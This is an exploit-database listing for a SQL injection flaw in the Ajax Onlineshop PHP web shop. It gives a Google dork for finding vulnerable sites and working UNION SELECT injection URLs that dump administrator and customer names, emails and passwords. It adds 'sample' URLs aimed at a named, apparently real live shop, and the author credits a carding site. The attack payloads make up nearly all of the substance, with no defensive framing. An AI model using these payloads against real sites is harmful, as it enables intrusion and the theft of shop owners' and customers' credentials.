[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ajax Onlineshop SQL Injection Vulnerability

Author
TA4G
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11577
Category
web applications
Date add
24-11-2010
Platform
php
===========================================
Ajax Onlineshop SQL Injection Vulnerability
===========================================

############################################################################
#
# Exploit Title: Ajax Onlineshop
# Date: 22/11/2010
# Author: TA4G - TA4G@carder.us
# Location: Algeria
# Vendor: www.ajax-onlineshop.de
# Version: n/a
# Google dork : Powered by Ajax Onlineshop
# Platform / Tested on:  windows SP2 Francais V.(Pnx2 2.0)
# Category: webapps/0day
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#  L0v3 To: Mr-DraGon _ Kader11000 _ illusionist2512 _ AnGeL-PC _ indoushka
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#                Gr33tz to ### Www.Carder.Us ###
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#####################################################################################################################################
exploit:
/index.php?id=[ARTIKEL_ID]+and+1=0+union+all+select+1,2,3,concat_ws%280x3a,name,password%29%20,5,6,7,8+from+aong_admin_user--

/index.php?id=[ARTIKEL_ID]+and+1=0+union+all+select+1,2,3,concat_ws%280x3a,email,password%29%20,5,6,7,8+from+aong_user--

# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


sample:
http://www.zwergalhaus.de/index.php?id=49974+and+1=0+union+all+select+1,2,3,concat_ws%280x3a,name,password%29%20,5,6,7,8+from+aong_admin_user--

http://www.zwergalhaus.de/index.php?id=49974+and+1=0+union+all+select+1,2,3,concat_ws%280x3a,email,password%29%20,5,6,7,8+from+aong_user--

#####################################################################################################################################



#  0day.today [2024-09-28]  #